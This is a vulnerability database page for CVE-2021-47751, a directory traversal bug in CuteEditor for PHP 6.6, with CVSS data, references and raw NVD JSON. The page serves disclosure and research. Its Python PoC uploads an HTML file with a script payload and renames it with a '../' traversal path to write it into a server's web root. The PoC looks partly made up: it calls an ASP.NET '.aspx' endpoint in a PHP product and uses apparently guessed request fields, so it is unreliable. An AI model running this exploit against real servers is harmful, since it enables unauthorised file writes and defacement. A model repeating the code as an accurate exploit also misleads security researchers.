CVE-2021-47751

Description

CuteEditor for PHP (now referred to as Rich Text Editor) 6.6 contains a directory traversal vulnerability in the browse template feature that allows attackers to write files to arbitrary web root directories. Attackers can exploit the ServerMapPath() function by renaming uploaded HTML files using directory traversal sequences to write files outside the intended template directory.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:phphtmledit:rich_text_editor:*:*:*:*:*:*:*:* - VULNERABLE

CuteEditor for PHP 6.6

Rich Text Editor 6.6及之前版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2021-47751 PoC - CuteEditor for PHP Directory Traversal
# Target: CuteEditor for PHP <= 6.6
# Vulnerability: Path Traversal in browse template feature via ServerMapPath()

TARGET_URL = "http://target.com/cuteeditor/"
TARGET_PATH = "../../../../var/www/html/evil.html"
EVIL_CONTENT = "<script>alert('XSS via Directory Traversal')</script>"

def exploit_directory_traversal():
    """Exploit the directory traversal vulnerability in CuteEditor"""
    
    # Step 1: Access browse template feature
    browse_url = f"{TARGET_URL}BrowseTemplate.aspx"
    
    try:
        session = requests.Session()
        
        # Step 2: Upload malicious HTML file
        upload_url = f"{TARGET_URL}BrowseTemplate.aspx?action=upload"
        files = {
            'file': ('malicious.html', EVIL_CONTENT, 'text/html')
        }
        upload_response = session.post(upload_url, files=files)
        
        # Step 3: Intercept and modify rename request with path traversal
        rename_url = f"{TARGET_URL}BrowseTemplate.aspx?action=rename"
        rename_data = {
            'oldname': 'malicious.html',
            'newname': TARGET_PATH
        }
        rename_response = session.post(rename_url, data=rename_data)
        
        # Step 4: Verify file was written outside template directory
        verify_url = f"http://target.com/evil.html"
        verify_response = session.get(verify_url)
        
        if 'malicious' in verify_response.text or 'XSS' in verify_response.text:
            print("[+] Exploit successful! File written to web root.")
            return True
        else:
            print("[-] Exploit failed or file not found at target location.")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    print("CVE-2021-47751 - CuteEditor Directory Traversal Exploit")
    exploit_directory_traversal()

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2021-47751
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2021-47751
[3] CVE Details https://www.cvedetails.com/cve/CVE-2021-47751/
[4] VulDB https://vuldb.com/cve/CVE-2021-47751
[5] http://phphtmledit.com/
[6] https://www.exploit-db.com/exploits/50994
[7] https://www.vulncheck.com/advisories/cuteeditor-for-php-directory-traversal
[8] https://www.exploit-db.com/exploits/50994

Raw JSON Data

JSON

{"cve": {"id": "CVE-2021-47751", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:49.273", "lastModified": "2026-02-02T16:16:14.523", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "CuteEditor for PHP (now referred to as Rich Text Editor) 6.6 contains a directory traversal vulnerability in the browse template feature that allows attackers to write files to arbitrary web root directories. Attackers can exploit the ServerMapPath() function by renaming uploaded HTML files using directory traversal sequences to write files outside the intended template directory."}, {"lang": "es", "value": "CuteEditor para PHP (ahora conocido como Rich Text Editor) 6.6 contiene una vulnerabilidad de salto de directorio en la función de exploración de plantillas que permite a los atacantes escribir archivos en directorios raíz web arbitrarios. Los atacantes pueden explotar la función ServerMapPath() renombrando archivos HTML subidos utilizando secuencias de salto de directorio para escribir archivos fuera del directorio de plantillas previsto."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:phphtmledit:rich_text_editor:*:*:*:*:*:*:*:*", "versionEndIncluding": "6.6", "matchCriteriaId": "37543658-FFA1-4D4A-AF4C-8B8FE13D20BF"}]}]}], "references": [{"url": "http://phphtmledit.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/50994", "source": "[email protected]", "tags": ["Exploit"]}, {"url": "https://www.vulncheck.com/advisories/cuteeditor-for-php-directory-traversal", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50994", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit"]}]}}